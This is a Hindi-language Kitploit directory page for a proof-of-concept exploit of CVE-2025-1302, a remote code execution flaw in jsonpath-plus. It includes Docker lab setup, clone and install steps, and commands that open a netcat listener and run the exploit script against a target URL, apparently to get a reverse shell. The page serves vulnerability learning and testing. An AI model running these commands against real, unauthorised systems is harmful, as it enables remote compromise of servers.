Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-1302 — JSONPath-plus Remote Code Execution | Kitploit
उपकरण/GitHubGitHub/eqstlab/cve-2025-1302
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationLearning & EducationLabs & Practice
GitHubeqstlab/cve-2025-1302

CVE-2025-1302

JSONPath-plus Remote Code Execution

रिपॉजिटरी देखें
2011 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-1302

★ CVE-2025-1302 JSONPath-plus RCE PoC ★

https://github.com/user-attachments/assets/5d791540-ef6c-4cd0-bd25-7a1dbbd194fb

प्रयोगशाला सेटअप

root@kitploit:~
docker build -t jsonpath:10.2.0 .
docker run --rm --name jsonpath -p 3000:3000 jsonpath:10.2.0

localhost:3000 image

विवरण

पैकेज jsonpath-plus के 10.3.0 से पहले के संस्करण अनुचित इनपुट स्वच्छता के कारण रिमोट कोड निष्पादन (RCE) के लिए संवेदनशील हैं। एक हमलावर eval='safe' मोड के असुरक्षित डिफ़ॉल्ट उपयोग का शोषण करके सिस्टम पर मनमाना कोड निष्पादित कर सकता है। नोट: यह CVE-2024-21534 के अधूरे सुधार के कारण होता है।

उपयोग कैसे करें

Git क्लोन

root@kitploit:~
git clone https://github.com/EQSTLab/CVE-2025-1302.git
cd CVE-2025-1302

पैकेज स्थापित करें

root@kitploit:~
pip install -r requirements.txt

कमांड

root@kitploit:~
nc -l -p <LPORT>
python3 CVE-2025-1302.py -u <URL_TO_EXPLOIT> -i <LHOST> -p <LPORT>

आउटपुट

image

परिणाम

image

अस्वीकरण

यह रिपॉजिटरी CVE-2025-1302 के RCE शोषण के रूप में अभिप्रेत नहीं है। इस परियोजना का उद्देश्य लोगों को इस कमजोरी के बारे में सीखने और शायद अपने स्वयं के अनुप्रयोगों का परीक्षण करने में मदद करना है।

EQST Insight

We publish CVE and malware analysis once a month. If you're interested, please follow the links below to check out our publications. https://www.skshieldus.com/eng/business/insight.do

टूल डाउनलोड करें